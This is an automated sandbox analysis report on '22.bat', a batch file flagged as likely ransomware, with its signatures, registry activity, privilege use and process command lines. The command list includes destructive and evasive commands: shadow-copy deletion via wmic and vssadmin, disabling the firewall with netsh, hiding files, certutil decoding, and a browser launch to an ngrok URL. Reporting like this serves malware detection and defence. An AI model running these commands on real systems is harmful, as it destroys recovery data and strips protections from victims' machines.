Malware Analysis Report

2025-03-15 00:56

Sample ID 240626-j8cbzaxfnq
Target 22.bat
SHA256 8254c19785e9b98091dc3644126e1b41188cba52549b2cdd5a84c4d4beb8c4f8
Tags defense_evasion evasion execution impact persistence privilege_escalation ransomware
Score 9/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score 9/10

SHA256 8254c19785e9b98091dc3644126e1b41188cba52549b2cdd5a84c4d4beb8c4f8

Threat Level: Likely malicious

The file 22.bat was found to be: Likely malicious.

Malicious Activity Summary

defense_evasion evasion execution impact persistence privilege_escalation ransomware

Deletes shadow copies

Modifies Windows Firewall

Sets file to hidden

Checks computer location settings

Enumerates connected drives

Sets desktop wallpaper using registry

Event Triggered Execution: Netsh Helper DLL

Enumerates physical storage devices

Views/modifies file attributes

Uses Volume Shadow Copy service COM API

Gathers network information

Interacts with shadow copies

Modifies Control Panel

Suspicious behavior: AddClipboardFormatListener

Suspicious use of SetWindowsHookEx

Delays execution with timeout.exe

Modifies Internet Explorer settings

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported 2024-06-26 08:19

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted 2024-06-26 08:19
Reported 2024-06-26 08:22
Platform win10v2004-20240508-en
Max time kernel 131s
Max time network 152s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\22.bat"

Signatures

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Windows\system32\wscript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Windows\system32\wscript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Windows\system32\wscript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Windows\system32\wscript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Windows\system32\wscript.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\E: C:\Windows\system32\cmd.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\cmd.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\cmd.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Wallpaper.jpeg" C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Wallpaper.jpeg" C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Wallpaper.jpeg" C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Wallpaper.jpeg" C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Wallpaper.jpeg" C:\Windows\system32\wscript.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\system32\ipconfig.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop C:\Windows\system32\wscript.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop C:\Windows\system32\wscript.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop C:\Windows\system32\wscript.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop C:\Windows\system32\wscript.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop C:\Windows\system32\wscript.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\explorer.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 19002f433a5c000000000000000000000000000000000000000000 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0 = 5000310000000000a858ce6d10004c6f63616c003c0009000400efbea8582761da5883422e00000096e10100000001000000000000000000000000000000e58d7f004c006f00630061006c00000014000000 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell C:\Windows\explorer.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = 00000000ffffffff C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\NodeSlot = "1" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 7800310000000000a85827611100557365727300640009000400efbe874f7748da5883422e000000c70500000000010000000000000000003a0000000000eff5be0055007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\MRUListEx = 00000000ffffffff C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic" C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 = 5600310000000000a858276112004170704461746100400009000400efbea8582761da5883422e00000083e10100000001000000000000000000000000000000db45ae004100700070004400610074006100000016000000 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0 = 4e00310000000000da588342100054656d7000003a0009000400efbea8582761da5883422e00000097e1010000000100000000000000000000000000000041905a00540065006d007000000014000000 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 5000310000000000a858a66d100041646d696e003c0009000400efbea8582761da5883422e00000078e10100000001000000000000000000000000000000700c0d00410064006d0069006e00000014000000 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\MRUListEx = 00000000ffffffff C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 C:\Windows\explorer.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3608 wrote to memory of 2616 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 3608 wrote to memory of 2616 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 3608 wrote to memory of 4256 N/A C:\Windows\system32\cmd.exe C:\Windows\explorer.exe
PID 3608 wrote to memory of 4256 N/A C:\Windows\system32\cmd.exe C:\Windows\explorer.exe
PID 3608 wrote to memory of 3940 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ipconfig.exe
PID 3608 wrote to memory of 3940 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ipconfig.exe
PID 3608 wrote to memory of 3696 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3608 wrote to memory of 3696 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3608 wrote to memory of 3592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3608 wrote to memory of 3592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3608 wrote to memory of 3756 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 3608 wrote to memory of 3756 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 3608 wrote to memory of 3628 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3608 wrote to memory of 3628 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3608 wrote to memory of 3028 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 3608 wrote to memory of 3028 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 3608 wrote to memory of 1636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 3608 wrote to memory of 1636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 3608 wrote to memory of 3192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3608 wrote to memory of 3192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3608 wrote to memory of 2284 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3608 wrote to memory of 2284 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3608 wrote to memory of 1656 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3608 wrote to memory of 1656 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3608 wrote to memory of 3768 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3608 wrote to memory of 3768 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3608 wrote to memory of 3744 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3608 wrote to memory of 3744 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3608 wrote to memory of 2284 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 3608 wrote to memory of 2284 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 3608 wrote to memory of 3552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 3608 wrote to memory of 3552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 3608 wrote to memory of 4160 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 3608 wrote to memory of 4160 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 3608 wrote to memory of 3280 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 3608 wrote to memory of 3280 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 3608 wrote to memory of 864 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 3608 wrote to memory of 864 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 2284 wrote to memory of 3848 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\RUNDLL32.EXE
PID 2284 wrote to memory of 3848 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\RUNDLL32.EXE
PID 864 wrote to memory of 1684 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\RUNDLL32.EXE
PID 864 wrote to memory of 1684 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\RUNDLL32.EXE
PID 3280 wrote to memory of 1668 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\RUNDLL32.EXE
PID 3280 wrote to memory of 1668 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\RUNDLL32.EXE
PID 4160 wrote to memory of 1656 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\RUNDLL32.EXE
PID 4160 wrote to memory of 1656 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\RUNDLL32.EXE
PID 3552 wrote to memory of 5132 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\RUNDLL32.EXE
PID 3552 wrote to memory of 5132 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\RUNDLL32.EXE
PID 3608 wrote to memory of 5232 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3608 wrote to memory of 5232 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3608 wrote to memory of 5692 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 3608 wrote to memory of 5692 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 3608 wrote to memory of 5772 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 3608 wrote to memory of 5772 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\22.bat"

C:\Windows\system32\attrib.exe

attrib Admin-information.log +h

C:\Windows\explorer.exe

explorer .

C:\Windows\system32\ipconfig.exe

ipconfig /all

C:\Windows\explorer.exe

C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all/quiet

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://ca82-152-231-188-225.ngrok-free.app/Kit

C:\Windows\system32\mode.com

mode con: cols=170 lines=45

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=4368,i,15142778360084620907,1763097090506261076,262144 --variations-seed-version --mojo-platform-channel-handle=4128 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --field-trial-handle=4784,i,15142778360084620907,1763097090506261076,262144 --variations-seed-version --mojo-platform-channel-handle=4512 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --field-trial-handle=5284,i,15142778360084620907,1763097090506261076,262144 --variations-seed-version --mojo-platform-channel-handle=5308 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=5436,i,15142778360084620907,1763097090506261076,262144 --variations-seed-version --mojo-platform-channel-handle=5500 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --field-trial-handle=5444,i,15142778360084620907,1763097090506261076,262144 --variations-seed-version --mojo-platform-channel-handle=5544 /prefetch:8

C:\Windows\system32\certutil.exe

certutil -decode "Image.bin" "Wallpaper.jpeg"

C:\Windows\system32\timeout.exe

timeout /t 3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --field-trial-handle=5980,i,15142778360084620907,1763097090506261076,262144 --variations-seed-version --mojo-platform-channel-handle=5984 /prefetch:1

C:\Windows\system32\timeout.exe

timeout /t 3

C:\Windows\system32\timeout.exe

timeout /t 3

C:\Windows\system32\timeout.exe

timeout /t 5

